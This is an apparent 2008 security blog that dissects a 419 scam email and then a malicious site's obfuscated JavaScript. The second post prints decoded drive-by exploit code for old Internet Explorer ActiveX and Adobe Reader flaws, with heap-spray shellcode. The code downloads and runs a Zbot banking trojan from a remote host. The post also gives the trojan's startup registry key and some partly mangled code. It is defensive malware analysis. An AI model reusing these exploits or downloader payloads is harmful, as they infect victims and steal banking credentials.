Sunday, December 21, 2008

IMF 419 Scam

419 and other advance-fee fraud scams are a regular part of life in the email world. I like to dig through my spam boxes to see what nuggets come up. A recent email with the subject "ECONOMIC STORM" indicated the "IMF international monetary fund and the world bank have collaborated to tackle the global economic storm facing the world." I'm glad to see someone is working to fix the economic crisis.

The email is spoofed from Mr. Dominique Strauss-Kahn and originates from the CHINANET-GD registered IP The email requests that the reply go to


Received: by with SMTP id s1cs313745fgb;
Sat, 20 Dec 2008 10:36:07 -0800 (PST)
Received: by with SMTP id s1mr2802117wad.118.1229798166053;
Sat, 20 Dec 2008 10:36:06 -0800 (PST)
Received: from pfyq6 ([])
by with SMTP id k21si16564504waf.32.2008.;
Sat, 20 Dec 2008 10:36:06 -0800 (PST)
Received-SPF: neutral ( is neither permitted nor denied by best guess record for domain of client-ip=;
Authentication-Results:; spf=neutral ( is neither permitted nor denied by best guess record for domain of
Message-Id: <>
From: "Mr.Dominique Strauss-Kahn"
Content-Type: text/plain;
Date: Sun, 21 Dec 2008 02:36:04 +0800
X-Priority: 3

This is to inform you/your company that IMF international monetary fund and the
world bank have collaborated to tackle the global economic storm facing
the world.
These authority have set aside the sum of USD 10,000,000,000 ( Ten Billion
United State Dollars ) to finance individuals/companies around the globe
who have a reasonable project.
All applicant should send their full data and project details (project name,
project purpose,project cost) to the address given below to apply the
support for your project.

Reply to Mr. John Condo
Project Finance Section
IMF Office Beijing China
( )

Yours sincerely,
Mr.Dominique Strauss-Kahn
Managing Director, IMF

The email attempts to validate itself by including a hyperlink to the bio of Mr. Dominique Strauss-Kahn. The only problem is that the link points to the bio of Mr. Rodrigo de Rato, from Spain, who was the former Managing Director from June 7, 2004 to October 31, 2007.

Even the scammers can't keep up over time. It's amazing to security practitioners that these scams work, but at the same time we've all been asked by someone about the legitimacy of a virus hoax, 419, lottery, or chain email. You wouldn't think it's that profitable, but every once in a while the scammers hit a goldmine. For example, Bruce Schneier recently blogged about a woman who lost $400K in a 419 scam. All I can say is I'm looking forward to my slice of the $10 Billion. WoooHooo!!!

Friday, December 19, 2008

Exploit Analysis

The analysis of exploit code hosted at results in the typical TTP that includes malicious obfuscated JavaScript, browser-based IE exploits, banking credential stealing malware and ISPs with dubious reputations. The story follows...

A request for returns 3 sections of obfuscated exploit code and an iframe for hxxp://soft4youupdat(dot)org.

<script>opdYzUDi=document.location.href;if(opdYzUDi.indexOf('http://')!=-1){eval('Tgwm\x61Tgwm\x7aTgwm…….truncated…….\x7bTgwm\x7dTgwm\x7d'.replace(/Tgwm/g, ''));}</script>

<script>ftXokBk6=document.location.href;if(ftXokBk6.indexOf('http://')!=-1){eval('qyT\x66qyT\x75qyT…….truncated…….\x7bqyT\x7dqyT\x7d'.replace(/qyT/g, ''));}</script>

<html><iframe src="hxxp://soft4youupdat(dot)org/counts/cache/doc.pdf" widht="1" height="1"></iframe></html>

<script>hu7AMj=document.location.href;if(hu7AMj.indexOf('http://')!=-1){eval('MZnVp\x76MZnVp\x61MZnVp…….truncated…….\x28MZnVp\x29MZnVp\x3b'.replace(/MZnVp/g, ''));}</script>

The JavaScript replace() method is used to obfuscate the exploit code. The replace() method syntax is

string.replace(regexp, newstring)

A 'g' flag is used to perform a global search (every match is replaced, not just the first) and an 'i' flag is used to perform a case-insensitive search. The three script sections above use /Tgwm/g, /qyT/g and /MZnVp/g to strip a junk token from every position in the string before the result is passed to eval().

Exploit Block 1

The first block of exploit code globally replaces the characters Tgwm with the empty string ''. The decoded section returns a string of escaped hexadecimal characters.


The hexadecimal character string decodes to reveal additional code that again uses the JavaScript replace() Method for obfuscation. The script decodes to reveal MDAC RDS.Dataspace ActiveX Control Vulnerability (CVE-2006-0003, MS06-014) exploit code. The payload is a GET request for hxxp://soft4youupdat(dot)org/counts/bin/default.exe.

az = new Array();az.push('h^t&tp)&://#$s$o#)ft4!yo*uup!da)t.)or*g!$/c((ou*n@ts!/)b#i%$n!/!@def!a^&u(l*t.exe#'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''));for(i = 0; i <= az.length - 1; i++){ start(az[i], '.%/$/*@..^#/)@/f)i#(le#'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, '') + i + '.(e(^x^e!'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''));}function start(sUrl, sPath) { var z = document.createElement('o&b!j))e*ct!'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''));z.setAttribute('id'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''),'z'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, '')); z.setAttribute('clas@s!!i$!d@$'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''), 'cl%(s&id:)B*D^9%6#C(5*^56&-^*65A3$-^11(D!(0-98*3A%-0#0(C%(0^4@FC@2(9(&E36$'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''));try { var q = z.CreateObject('m&s!(xm@l%2.^&X&@M*LH@@T%T%*P'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''), ''.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, '')); var s = z.CreateObject('Sh$@el#l).A%)p(pli&c$^a$t((ion'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''), ''.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''));var t = z.CreateObject('a@do%db^).$#s$)t%(r!eam'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''), ''.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, '')); try { t.type = 1;'GE!T'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''), sUrl, false);q.send();; t.write(q.responseBody); t.savetofile(sPath,2); t.close();} catch(e) {}try { s.shellexecute(sPath); if(shellexecute=true) { var b = new ActiveXObject('M)icros@#oft*&.X)$M^L&!H%&T&TP!'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''));'G!ET#'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''), 'l*$o%!ad).php^#?)m@dc='.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, '') + Math.random()); b.send(null); }} catch(e){}} catch(e){}}
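As an added example (not code from the original post), here is a static deobfuscator for the two replace()-based layers described in Block 1: it resolves each '...'.replace(/.../flags, '') call textually, decodes the \xNN escapes the way the JS parser would, unwraps the eval() argument and repeats, without ever executing the sample. The input it runs on is a constructed benign fixture in the same junk-token form, not the captured code above; the function and variable names are my own.

```javascript
// One obfuscation call: a single-quoted literal followed by .replace(/pattern/flags, '')
const REPLACE_CALL = /'((?:[^'\\]|\\.)*)'\.replace\(\/((?:[^\/\\]|\\.)+)\/([a-z]*),\s*''\)/g;
// After resolution the eval() argument is a JSON-style double-quoted literal
const EVAL_ARG = /eval\("((?:[^"\\]|\\.)*)"\)/;

// Resolve \xNN escapes first, as the JS parser does before replace() ever runs
function decodeHexEscapes(s) {
  return s.replace(/\\x([0-9a-fA-F]{2})/g, (_, h) => String.fromCharCode(parseInt(h, 16)));
}

// Replace every obfuscation call with the plain literal it evaluates to
function resolveReplaceCalls(src) {
  return src.replace(REPLACE_CALL, (_, lit, pat, flags) =>
    JSON.stringify(decodeHexEscapes(lit).replace(new RegExp(pat, flags), '')));
}

// Return the string handed to eval(), or null when no eval("...") remains
function extractEvalArg(src) {
  const m = EVAL_ARG.exec(src);
  return m ? JSON.parse('"' + m[1] + '"') : null;
}

// Peel layers until no eval() call is left; returns one resolved source per layer
function deobfuscate(src, maxLayers = 5) {
  const layers = [];
  let cur = src;
  for (let i = 0; i < maxLayers; i++) {
    cur = resolveReplaceCalls(cur);
    layers.push(cur);
    const inner = extractEvalArg(cur);
    if (inner === null) break;
    cur = inner;
  }
  return layers;
}

// Test fixture only: wrap a benign inner script in the same junk-token + \xNN
// form as the samples above (constructed here, not captured from the page's host)
function buildSample(inner, token) {
  const hex = [...inner].map(c => token + '\\x' + c.charCodeAt(0).toString(16).padStart(2, '0')).join('');
  return "<script>v=document.location.href;if(v.indexOf('http://')!=-1){eval('" +
    hex + "'.replace(/" + token + "/g, ''));}</script>";
}

// Constructed inner layer using the same punctuation-noise pattern as the second stage
const INNER = String.raw`var tag = 'o&b!j))e*ct!'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, '');`;
const SAMPLE = buildSample(INNER, 'Tgwm');

const layers = deobfuscate(SAMPLE);
console.log(layers[layers.length - 1]); // var tag = "object";
```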

Exploit Block 2

The second block of exploit code uses the same obfuscation technique decoding to reveal Microsoft Access Snapshot Viewer ActiveX Control Vulnerability (CVE-2008-2463, MS08-041) exploit code. The payload is hxxp://soft4youupdat(dot)org/counts/load.php?ssv=' + Math.random().

function killErrors() { return true; } window.onerror = killErrors; var x; var obj;var myarr = new Array(); myarr[0] = 'c:\\Program Files\\Outlook Express\\wab.exe';myarr[1] = 'd:\\Program Files\\Outlook Express\\wab.exe';myarr[2] = 'e:\\Program Files\\Outlook Express\\wab.exe';setTimeout('window.location = "ldap://"', 5000);for (x in myarr){obj = new ActiveXObject('snpv$w@.S$*n%(a&ps&h%)o$t!$ Vi)ew&e&$r)# Co$n&t(ro$l.*%1$'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''));try{var buf1 = 'http://soft4youupdat(dot)org/counts/load.php?ssv=' + Math.random();var buf2 = myarr[x]; obj.Zoom = 0;obj.SnapshotPath = buf1; obj.CompressedPath = buf2; obj.PrintSnapshot();}catch(e){}}

Exploit Block 3
The third block of exploit code included an iframe for hxxp://soft4youupdat(dot)org/counts/cache/doc.pdf. The PDF contained buffer overflow exploit code targeted against a vulnerability in the JavaScript method Collab.collectEmailInfo() in Adobe PDF Reader’s JavaScript engine (CVE-2007-5659, APSB08-13). The PDF metadata indicates it was created with Scribus, which provides desktop publishing for Linux/Unix. Scribus provides a step-by-step guide to enhancing PDFs with JavaScript. The creation date is 8-6-08.

13 0 obj

[filter FlateDecode has been applied to the JavaScript bitstream]

12 0 obj
14 0 obj
/Producer (Scribus PDF Library
/Author <>
/Keywords <>
/Trapped /False
/ModDate (D:20080806014227)
/CreationDate (D:20080806014227)

The tool Pdftk - the PDF Toolkit - can be used to inflate the FlateDecode-compressed JavaScript stream. The tool syntax is:

pdftk input.pdf output output.pdf uncompress

The exploit shellcode payload is a GET request for hxxp://soft4youupdat(dot)org/counts/load.php?pdf=35f4a8d465e6e1edc05f3d8ab658c551.

function rvcfcd208495d565e()
var rvc4ca4238a0b9238 = new Array();

function rvc81e728d9d4c2f6(rveccbc87e4b5ce2f, rva87ff679a2f3e71)
while (rveccbc87e4b5ce2f.length * 2 < rveccbc87e4b5ce2f =" rveccbc87e4b5ce2f.substring(0," rv1679091c5a880fa =" 0x0c0c0c0c;" rv8f14e45fceea167 =" unescape(" rvc9f0f895fb98ab9 =" 0x400000;" rv45c48cce2e2d7fb =" rv8f14e45fceea167.length" rva87ff679a2f3e71 =" rvc9f0f895fb98ab9" rveccbc87e4b5ce2f =" unescape(" rveccbc87e4b5ce2f =" rvc81e728d9d4c2f6(rveccbc87e4b5ce2f," rvd3d9446802a4425 =" (rv1679091c5a880fa" rv6512bd43d9caa6e =" 0;" rvc51ce410c124a10 =" app.viewerVersion.toString();" rvc51ce410c124a10 =" rvc51ce410c124a10.replace(/\D/g," rvaab3238922bcc25 =" new" rv9bf31c7ff062936 =" unescape(" collabstore =" Collab.collectEmailInfo({subj:">

Exploit Block 4
The fourth block of exploit code uses the same obfuscation technique decoding to reveal 3 buffer overflow exploits:

• COM Object Instantiation Memory Corruption Vulnerability (CVE-2005-2127, MS05-052)
• Online Media Technologies NCTsoft NCTAudioFile2 ActiveX buffer overflow - CVE-2007-0018
• Microsoft Visual Studio 'Msmask32.ocx' ActiveX Control Remote Buffer Overflow Vulnerability (MS08-070)

The shellcode payload for all 3 exploits is hxxp://soft4youupdat(dot)org/counts/load.php?bof=3c59dc048e8850243be8079a5c74d079.

var Shellcode = unescape("%u4343%u4343%u0feb%u335b%u66c9%u80b9%u8001%uef33%ue243%uebfa%ue805%uffec%uffff%u8b7f%udf4e%uefef%u64ef%ue3af%u9f64%u42f3%u9f64%u6ee7%uef03%uefeb%u64ef%ub903%u6187%ue1a1%u0703%uef11%uefef%uaa66%ub9eb%u7787%u6511%u07e1%uef1f%uefef%uaa66%ub9e7%uca87%u105f%u072d%uef0d%uefef%uaa66%ub9e3%u0087%u0f21%u078f%uef3b%uefef%uaa66%ub9ff%u2e87%u0a96%u0757%uef29%uefef%uaa66%uaffb%ud76f%u9a2c%u6615%uf7aa%ue806%uefee%ub1ef%u9a66%u64cb%uebaa%uee85%u64b6%uf7ba%u07b9%uef64%uefef%u87bf%uf5d9%u9fc0%u7807%uefef%u66ef%uf3aa%u2a64%u2f6c%u66bf%ucfaa%u1087%uefef%ubfef%uaa64%u85fb%ub6ed%uba64%u07f7%uef8e%uefef%uaaec%u28cf%ub3ef%uc191%u288a%uebaf%u8a97%uefef%u9a10%u64cf%ue3aa%uee85%u64b6%uf7ba%uaf07%uefef%u85ef%ub7e8%uaaec%udccb%ubc34%u10bc%ucf9a%ubcbf%uaa64%u85f3%ub6ea%uba64%u07f7%uefcc%uefef%uef85%u9a10%u64cf%ue7aa%ued85%u64b6%uf7ba%uff07%uefef%u85ef%u6410%uffaa%uee85%u64b6%uf7ba%uef07%uefef%uaeef%ubdb4%u0eec%u0eec%u0eec%u0eec%u036c%ub5eb%u64bc%u0d35%ubd18%u0f10%u64ba%u6403%ue792%ub264%ub9e3%u9c64%u64d3%uf19b%uec97%ub91c%u9964%ueccf%udc1c%ua626%u42ae%u2cec%udcb9%ue019%uff51%u1dd5%ue79b%u212e%uece2%uaf1d%u1e04%u11d4%u9ab1%ub50a%u0464%ub564%ueccb%u8932%ue364%u64a4%uf3b5%u32ec%ueb64%uec64%ub12a%u2db2%uefe7%u1b07%u1011%uba10%ua3bd%ua0a2%uefa1%u7468%u7074%u2F3A%u732F%u666F%u3474%u6F79%u7575%u6470%u7461%u6F2E%u6772%u632F%u756F%u746E%u2F73%u6F6C%u6461%u702E%u7068%u623F%u666F%u333D%u3563%u6439%u3063%u3834%u3865%u3538%u3230%u3334%u6562%u3038%u3937%u3561%u3763%u6434%u3730%u0039");function geSpyrrSlirrdep(sssprassydddbSliiide, saruuysaddize){while (sssprassydddbSliiide.length * 2 < sssprassydddbsliiide =" sssprassydddbSliiide.substring(0," hpsdyytttscess =" 0x0c0c0c0c;var" hadttdtsize =" 0x400000;var" payfdlytyusade =" Shellcode.length" tggter =" payfdLytyusade" saruuysaddize =" hadttdtSize" sssprassydddbsliiide =" unescape(" prrerat =" new" sssprassydddbsliiide =" geSpyrrSlirrdep(sssprassydddbSliiide," kilrrer =" hpsdyytttscess" hsttiicks =" kilrrer" i =" 0;" ugric =" 
unescape(" xyz =" 0x40000;while(ugric.length" ugric =" ugric.substring(0," bublic =" new" i =" bublic;">');zorro = Math.ceil(0xd0d0d0d);zorro = document.scripts[0].createControlRange().length;}catch(e) {}setTimeout("startAudioFile()", 2000);}function startAudioFile(){try{var mmed = document.createElement("object");mmed.setAttribute("classid", "clsid:77829F14-D911-40FF-A2F0-D11DB8D6D0BC");var mms="";for(var i=0; i < body =" '';var buf1 = '';for (i = 1; i <= 1945; i++){buf1 = buf1 + unescape(" href="">

Malware Analysis
The payload for all of the soft4youupdat(dot)org exploits is the same binary file.

Filename: bin_default.exe/default.exe
MD5: d9b7bf5b02fa9d1fc9da041916ff0a5e
Size: 59,392 bytes

The malware is a Zbot trojan which steals online banking information and downloads additional malware.

The following files are created:

308,736 bytes


The following registry key is created to launch the malware at startup:

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] Userinit = "%System%\userinit.exe,%System%\ntos.exe,"

VirusTotal indicates a low detection rate for this particular variant at the time of analysis [Result: 9/38 (23.68%)].

Domain Analysis
The domain was registered 11-20-08 at Everyones Internet, Ltd.

Domain ID:D154732571-LROR Domain

Created On:20-Nov-2008 12:59:45 UTC
Last Updated On:20-Nov-2008 13:19:16 UTC
Expiration Date:20-Nov-2009 12:59:45 UTC
Sponsoring Registrar:Everyones Internet, Ltd. (R1381-LROR)
Registrant ID:tul8MyjB2Dv7rqIF
Registrant Name:Vladimir Mashkov
Registrant Organization:N/A
Registrant Street1:st. Lenin's 56 square 43
Registrant Street2:
Registrant Street3:
Registrant City:Moscow
Registrant State/Province:Moscow
Registrant Postal Code:10010
Registrant Country:RU
Registrant Phone:+7.4950784576
Registrant Phone Ext.:
Registrant FAX:
Registrant FAX Ext.:
Registrant Email:

The domain currently resolves to which is registered to the Plano, TX company SOFTLAYER Technologies Inc. (ASN AS36351,

aut-num: AS36351
as-name: SOFTLAYER
descr: SoftLayer Technologies Inc.
import: from AS-ANY accept ANY AND NOT {}
export: to AS-ANY announce AS36351
admin-c: IPADM258-ARIN
tech-c: IPADM258-ARIN
mnt-by: MAINT-AS36351
changed: 20060110
source: RADB

SOFTLAYER Technologies Inc leased IP space to Innovation IT Solutions Corp, which is an international communications company headquartered in London, UK.

Innovation IT Solutions Corp. NET-67-228-139-0 (NET-67-228-139-0-1) -

SOFTLAYER Technologies Inc is listed by in their top 10 worst network block owners, and the McColo Cyber Crime USA – V2.0 report lists the ISP in the top 5 worst network block owners. Both Innovation IT Solutions Corp and SOFTLAYER Technologies Inc have been previously tied to RBN activity and the Russian cyberwar on Georgia.